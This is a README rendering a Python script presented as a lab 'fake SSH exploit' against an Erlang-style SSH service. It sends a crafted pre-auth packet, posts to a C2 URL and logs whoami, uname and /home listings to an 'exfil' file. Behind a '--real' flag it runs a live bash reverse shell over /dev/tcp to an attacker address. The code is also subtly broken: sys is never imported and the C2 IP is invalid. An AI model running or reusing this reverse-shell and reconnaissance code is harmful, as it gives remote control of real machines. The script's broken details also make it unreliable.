README.md
Rendering markdown...
import socket
import time
import os
import requests
# === Lab Setup ===
target_ip = "127.0.0.1" # change this to your VM or leave as loopback
attacker_ip = "192.168.1.1" # change if needed
attacker_port = 4444
c2_url = "http://22.22.333.333:8080/report" #change to your c2 ip
# === Fake SSH Exploit ===
def build_ssh_version():
return b'SSH-2.0-ErlangTest_0.1\r\n'
def build_crafted_packet():
return b"\x00\x00\x00\x10" + b"\x41" * 16
def trigger_reverse_shell():
if '--real' in sys.argv:
print(f"[+] Launching real reverse shell to {attacker_ip}:{attacker_port}")
os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")
else:
try:
print(f"[+] Sending simulated reverse shell report to C2 at {c2_url}")
requests.post(c2_url, data="💥 Simulated reverse shell triggered to attacker machine!")
except Exception as e:
print(f"[!] Callback failed: {e}")
def simulate_post_exploitation():
print("[+] Simulating post-exploitation behavior...")
# Command 1: whoami
os.system("whoami >> /tmp/exfil.log")
# Command 2: system info
os.system("uname -a >> /tmp/exfil.log")
# Command 3: show directory structure
os.system("ls -alh /home/ >> /tmp/exfil.log")
# Dummy credentials
with open("/tmp/exfil.log", "a") as f:
f.write("\n[+] Simulated exfil of dummy credentials...\n")
f.write("username: admin\npassword: hunter2\n")
print("[+] Post-exploitation simulation written to /tmp/exfil.log")
def send_exploit():
print(f"[+] Connecting to target {target_ip}:22...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 22))
sock.sendall(build_ssh_version())
print(f"[+] Sent SSH version string")
time.sleep(0.5)
sock.sendall(build_crafted_packet())
print(f"[+] Sent crafted SSH pre-auth packet")
time.sleep(0.5)
sock.close()
except Exception as e:
print(f"[!] Could not connect/send to target: {e}")
# Simulated shell + post-exploitation
trigger_reverse_shell()
time.sleep(1)
simulate_post_exploitation()
if __name__ == "__main__":
send_exploit()